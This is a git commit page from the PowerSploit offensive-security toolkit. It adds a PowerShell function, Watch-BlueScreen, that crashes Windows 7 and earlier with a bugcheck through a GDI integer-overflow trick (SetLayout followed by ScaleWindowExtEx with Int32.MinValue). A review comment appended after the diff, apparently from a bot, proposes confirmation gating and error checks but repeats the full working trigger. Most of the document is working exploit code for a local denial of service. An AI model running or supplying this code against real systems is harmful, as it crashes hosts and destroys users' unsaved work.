authorMatt Graeber <mattgraeber@gmail.com>2013-05-13 20:01:59 -0400
committerMatt Graeber <mattgraeber@gmail.com>2013-05-13 20:01:59 -0400
commit2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch)
tree7315164342e510e3ab7b7feccdaab24204a53f3b /CodeExecution/Watch-BlueScreen.ps1
parentf32a572fb971f288d2950af9a6c6d2031a52df2b (diff)
Added Watch-BlueScreen
Causes a blue-screen (bugcheck) to occur.
Diffstat (limited to 'CodeExecution/Watch-BlueScreen.ps1')
-rw-r--r--CodeExecution/Watch-BlueScreen.ps174
1 files changed, 74 insertions, 0 deletions
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
new file mode 100644
index 0000000..8523bf2
--- /dev/null
+++ b/CodeExecution/Watch-BlueScreen.ps1
@@ -0,0 +1,74 @@
+function Watch-BlueScreen
+{
+<#
+.SYNOPSIS
+
+ Cause a blue screen to occur (Windows 7 and below).
+
+ PowerSploit Function: Watch-BlueScreen
+ Author: Matthew Graeber (@mattifestation)
+ Original Research: Tavis Ormandy and Nikita Tarakanov
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.NOTES
+
+ Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
+ ‏tweeted this technique on 5/13/2013.
+
+.LINK
+
+ https://gist.github.com/taviso/4658638
+ http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
+ https://twitter.com/NTarakanov/status/334031968465453057
+#>
+
+ try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
+ {
+ $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
+ $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
+
+ $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+ $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+ $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
+ [Reflection.FieldInfo[]]@($SetLastError), @($true))
+
+ $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [IntPtr],
+ @([IntPtr]),
+ 'Winapi',
+ 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
+
+ $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [UInt32],
+ @([IntPtr], [UInt32]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [Bool],
+ @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ $Gdi32 = $TypeBuilder.CreateType()
+ }
+
+ $LAYOUT_RTL = 1
+
+ $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
+ $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
+ $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
+} \ No newline at end of file
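Review bot: The three GDI calls at the end of the new file run with no confirmation and no result checking: `CreateCompatibleDC` can return `[IntPtr]::Zero`, in which case `SetLayout`/`ScaleWindowExtEx` are fed a null HDC and the function exits silently, and on a host that is not affected `ScaleWindowExtEx` simply returns and the function also exits silently, so a caller cannot distinguish a failed setup from a patched target. Since the function's only purpose is to crash the machine it runs on (the commit message says so), it should also be declared with `[CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]` and gated on `$PSCmdlet.ShouldProcess(...)` so an accidental invocation prompts instead of bugchecking; the `SetLastError` flag already set on `CreateCompatibleDC` makes `Marshal::GetLastWin32Error()` usable for the failure message. The `'ntdll.dll'` passed to the `DllImportAttribute` builder on the custom-attribute line looks like a copy/paste leftover from another PowerSploit script, since every P/Invoke here targets `Gdi32.dll`; it is presumably ignored, but `'Gdi32.dll'` would avoid confusing the next reader. The help block would benefit from a `.DESCRIPTION` stating plainly that this is a local denial of service that will lose unsaved work on the host.
```powershell
function Watch-BlueScreen
{
    # … unchanged: comment-based help …

    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    Param()

    # … unchanged: dynamic Gdi32 type definition …

    # Crashing the host is irreversible; require confirmation unless -Confirm:$false / -Force-style override is given.
    if (-not $PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Trigger a bugcheck (blue screen)'))
    {
        return
    }

    $LAYOUT_RTL = 1

    $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
    if ($DC -eq [IntPtr]::Zero)
    {
        throw "CreateCompatibleDC failed (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))."
    }

    $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
    $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null

    # Reaching this line means the host did not bugcheck; it is most likely patched or otherwise unaffected.
    Write-Warning 'ScaleWindowExtEx returned without a bugcheck; this host does not appear to be affected.'
}
```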